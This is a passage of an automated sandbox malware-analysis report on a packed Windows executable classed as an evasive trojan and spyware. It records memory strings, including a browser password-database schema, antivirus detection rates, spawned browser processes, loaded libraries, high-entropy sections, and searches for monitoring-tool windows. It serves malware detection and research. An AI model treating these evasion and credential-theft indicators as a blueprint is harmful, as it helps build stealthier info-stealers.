Source: rwFNJ4pHWG.exe, 00000000.00000003.1632019903.0000000005F5F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1621717918.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1655180773.0000000005AB6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1623250445.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1619973986.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1622761702.000000000601B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1619744130.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1627800838.0000000005F5A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1619859729.00000000060A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1623953563.0000000006027000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1634351673.0000000005F5A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1634882415.00000000060A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1632222870.0000000006090000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1622090145.000000000601F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1617292260.0000000005D56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1630449082.0000000005F56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1619025800.0000000005F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1626868297.0000000005F56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1629097197.0000000005F5D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1630839104.0000000005F58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1631852449.000000000619E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1623595536.0000000005F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1625634197.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1619510999.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1634008359.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1628233292.0000000006164000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1617411898.0000000005BBD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1620283977.0000000006005000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1628710668.0000000006068000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1627327786.0000000006163000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1627477756.0000000005F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1631024170.0000000006081000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1624081109.0000000005F56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1635223748.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1633343014.00000000060A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1629314952.000000000606C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1621484516.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1633845216.00000000061E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1623004957.0000000005F5F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1620391980.0000000005F56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1622256042.0000000005F59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1635044906.00000000061F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1621135900.0000000005F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1633686723.000000000609A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1626663992.000000000605F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1627978459.0000000006056000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1630685283.0000000006077000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1624665911.0000000005F56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1621254021.0000000006014000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1634518713.000000000609D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1631236670.00000000061B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1621600097.0000000006021000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1620733753.00000000060AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1634181253.00000000060A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1621369639.00000000060D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1623125585.000000000602E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1625006083.000000000611A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1620192277.0000000005F56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1624333711.0000000006112000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1625974081.0000000005F56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1655093897.0000000001279000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe

Source: rwFNJ4pHWG.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: rwFNJ4pHWG.exe

Static PE information: Section: ZLIB complexity 0.9995915032679739

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/64@9/5

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: rwFNJ4pHWG.exe, 00000000.00000003.1412338152.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1413392671.0000000005ACE000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1439504858.0000000005AD9000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: rwFNJ4pHWG.exe	Virustotal: Detection: 50%
Source: rwFNJ4pHWG.exe	ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe

File read: C:\Users\user\Desktop\rwFNJ4pHWG.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\rwFNJ4pHWG.exe "C:\Users\user\Desktop\rwFNJ4pHWG.exe"
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1892,i,7369555305632958663,5508331813539714622,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1900,i,6860416848940867115,5479095251510896605,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1892,i,7369555305632958663,5508331813539714622,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1900,i,6860416848940867115,5479095251510896605,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Section loaded: wkscli.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: rwFNJ4pHWG.exe

Static file information: File size 2955776 > 1048576

Source: rwFNJ4pHWG.exe

Static PE information: Raw size of xjxrrozg is bigger than: 0x100000 < 0x2a7c00

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: rwFNJ4pHWG.exe, 00000000.00000002.1736392714.00000000064D2000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe

Unpacked PE file: 0.2.rwFNJ4pHWG.exe.190000.0.unpack :EW;.rsrc :W;.idata :W;xjxrrozg:EW;uupzbzni:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;xjxrrozg:EW;uupzbzni:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: rwFNJ4pHWG.exe

Static PE information: real checksum: 0x2dadd6 should be: 0x2d2ae4

Source: rwFNJ4pHWG.exe	Static PE information: section name:
Source: rwFNJ4pHWG.exe	Static PE information: section name: .rsrc
Source: rwFNJ4pHWG.exe	Static PE information: section name: .idata
Source: rwFNJ4pHWG.exe	Static PE information: section name: xjxrrozg
Source: rwFNJ4pHWG.exe	Static PE information: section name: uupzbzni
Source: rwFNJ4pHWG.exe	Static PE information: section name: .taggant

Source: rwFNJ4pHWG.exe

Static PE information: section name: entropy: 7.978610804336836

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: Filemonclass	Jump to behavior
